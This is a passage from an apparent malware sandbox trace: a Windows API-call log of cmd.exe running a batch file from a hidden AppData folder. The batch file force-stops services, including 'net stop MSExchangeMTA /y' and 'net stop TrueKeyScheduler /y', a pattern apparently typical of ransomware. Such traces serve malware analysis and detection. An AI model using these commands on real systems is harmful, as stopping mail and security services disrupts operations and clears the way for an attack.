hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0214.040] GetProcessHeap () returned 0x3e0000 [0214.040] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0214.040] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.041] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x151e [0214.041] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x3a3, lpOverlapped=0x0) returned 1 [0214.041] SetFilePointer (in: hFile=0x78, lDistanceToMove=5433, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1539 [0214.041] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSExchangeMTA /y\r\n\r\nT /y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 27 [0214.041] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.041] GetFileType (hFile=0x78) returned 0x1 [0214.041] _get_osfhandle (_FileHandle=3) returned 0x78 [0214.041] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1539 [0214.041] GetProcessHeap () returned 0x3e0000 [0214.041] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0214.041] GetProcessHeap () returned 0x3e0000 [0214.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0214.045] _tell (_FileHandle=3) returned 5433 [0214.045] _close (_FileHandle=3) returned 0 [0214.045] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0214.045] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0214.045] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0214.045] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0214.045] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0214.045] _wcsicmp (_String1="net", _String2="CD") returned 11 [0214.045] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0214.045] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0214.045] _wcsicmp (_String1="net", _String2="REN") returned -4 [0214.045] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0214.045] _wcsicmp (_String1="net", _String2="SET") returned -5 [0214.045] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0214.045] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0214.045] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0214.045] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0214.045] _wcsicmp (_String1="net", _String2="MD") returned 1 [0214.045] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0214.045] _wcsicmp (_String1="net", _String2="RD") returned -4 [0214.045] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0214.045] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0214.045] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0214.045] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0214.045] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0214.045] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0214.045] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0214.045] _wcsicmp (_String1="net", _String2="VER") returned -8 [0214.045] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0214.045] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0214.045] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0214.046] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0214.046] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0214.046] _wcsicmp (_String1="net", _String2="START") returned -5 [0214.046] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0214.046] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0214.046] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0214.046] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0214.046] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0214.046] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0214.046] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0214.046] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0214.046] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0214.046] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0214.046] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0214.046] SetErrorMode (uMode=0x0) returned 0x1 [0214.046] GetProcessHeap () returned 0x3e0000 [0214.046] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0214.046] GetProcessHeap () returned 0x3e0000 [0214.046] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0214.047] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.047] GetProcessHeap () returned 0x3e0000 [0214.047] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0214.047] GetProcessHeap () returned 0x3e0000 [0214.047] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0214.047] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0214.047] GetProcessHeap () returned 0x3e0000 [0214.047] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0214.047] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.047] GetProcessHeap () returned 0x3e0000 [0214.047] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0214.048] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0214.048] GetProcessHeap () returned 0x3e0000 [0214.048] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0214.048] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.049] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.049] GetLastError () returned 0x2 [0214.049] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.049] GetLastError () returned 0x2 [0214.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.050] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.055] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.059] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.063] GetLastError () returned 0x2 [0214.063] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0214.063] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0214.064] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.064] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0214.064] SetErrorMode (uMode=0x0) returned 0x1 [0214.064] GetProcessHeap () returned 0x3e0000 [0214.064] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0214.064] GetProcessHeap () returned 0x3e0000 [0214.064] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0214.065] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.065] GetProcessHeap () returned 0x3e0000 [0214.065] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0214.065] GetProcessHeap () returned 0x3e0000 [0214.065] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0214.065] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0214.065] GetProcessHeap () returned 0x3e0000 [0214.065] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0214.065] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.065] GetProcessHeap () returned 0x3e0000 [0214.065] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0214.066] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0214.066] GetProcessHeap () returned 0x3e0000 [0214.066] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0214.066] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.067] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.067] GetLastError () returned 0x2 [0214.067] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.067] GetLastError () returned 0x2 [0214.068] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.068] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0214.068] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0214.069] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0214.069] GetLastError () returned 0x2 [0214.069] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0214.069] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0214.070] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.070] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0214.070] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0214.070] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0214.070] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.070] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeMTA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeMTA /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSExchangeMTA /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xb88, dwThreadId=0xb60)) returned 1 [0214.074] CloseHandle (hObject=0x78) returned 1 [0214.074] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.074] GetProcessHeap () returned 0x3e0000 [0214.074] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.074] GetEnvironmentStringsW () returned 0x3f8408* [0214.074] GetProcessHeap () returned 0x3e0000 [0214.074] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.074] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.074] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0214.207] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0214.207] CloseHandle (hObject=0x74) returned 1 [0214.207] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0214.207] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0214.207] GetProcessHeap () returned 0x3e0000 [0214.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.207] GetEnvironmentStringsW () returned 0x3f8408* [0214.207] GetProcessHeap () returned 0x3e0000 [0214.207] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.208] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.208] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.208] GetProcessHeap () returned 0x3e0000 [0214.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0214.208] GetEnvironmentStringsW () returned 0x3f8408* [0214.208] GetProcessHeap () returned 0x3e0000 [0214.208] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0214.208] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0214.208] GetProcessHeap () returned 0x3e0000 [0214.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0214.208] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0214.208] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.208] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0214.208] _get_osfhandle (_FileHandle=1) returned 0x264 [0214.208] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0214.208] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.208] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0214.209] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0214.209] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0214.209] SetConsoleInputExeNameW () returned 0x1 [0214.209] GetConsoleOutputCP () returned 0x1b5 [0214.209] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0214.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0214.210] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0214.210] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.210] SetFilePointer (in: hFile=0x74, lDistanceToMove=5433, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1539 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0214.210] GetProcessHeap () returned 0x3e0000 [0214.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0214.211] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.211] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1539 [0214.211] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x388, lpOverlapped=0x0) returned 1 [0214.211] SetFilePointer (in: hFile=0x74, lDistanceToMove=5463, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1557 [0214.211] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=30, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop TrueKeyScheduler /y\r\n /y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 30 [0214.211] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.211] GetFileType (hFile=0x74) returned 0x1 [0214.211] _get_osfhandle (_FileHandle=3) returned 0x74 [0214.211] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1557 [0214.211] GetProcessHeap () returned 0x3e0000 [0214.211] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0214.211] GetProcessHeap () returned 0x3e0000 [0214.211] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0214.215] _tell (_FileHandle=3) returned 5463 [0214.215] _close (_FileHandle=3) returned 0 [0214.215] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0214.215] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0214.215] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0214.215] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0214.215] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0214.215] _wcsicmp (_String1="net", _String2="CD") returned 11 [0214.215] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0214.215] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0214.215] _wcsicmp (_String1="net", _String2="REN") returned -4 [0214.215] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0214.215] _wcsicmp (_String1="net", _String2="SET") returned -5 [0214.215] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0214.215] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0214.215] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0214.215] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0214.215] _wcsicmp (_String1="net", _String2="MD") returned 1 [0214.215] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0214.215] _wcsicmp (_String1="net", _String2="RD") returned -4 [0214.215] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0214.215] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0214.215] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0214.215] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0214.216] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0214.216] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0214.216] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0214.216] _wcsicmp (_String1="net", _String2="VER") returned -8 [0214.216] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0214.216] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0214.216] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0214.216] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0214.216] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0214.216] _wcsicmp (_String1="net", _String2="START") returned -5 [0214.216] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0214.216] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0214.216] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0214.216] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0214.216] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0214.216] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0214.216] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0214.216] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0214.216] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0214.216] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0214.216] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0214.216] SetErrorMode (uMode=0x0) returned 0x1 [0214.217] GetProcessHeap () returned 0x3e0000 [0214.217] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0214.217] GetProcessHeap () returned 0x3e0000 [0214.217] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0214.217] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.217] GetProcessHeap () returned 0x3e0000 [0214.217] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0214.217] GetProcessHeap () returned 0x3e0000 [0214.217] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0214.217] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0214.217] GetProcessHeap () returned 0x3e0000 [0214.218] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0214.218] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.218] GetProcessHeap () returned 0x3e0000 [0214.218] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0214.218] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0214.218] GetProcessHeap () returned 0x3e0000 [0214.218] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0214.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.219] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0214.219] GetLastError () returned 0x2 [0214.219] FindFirstFileExW (in: 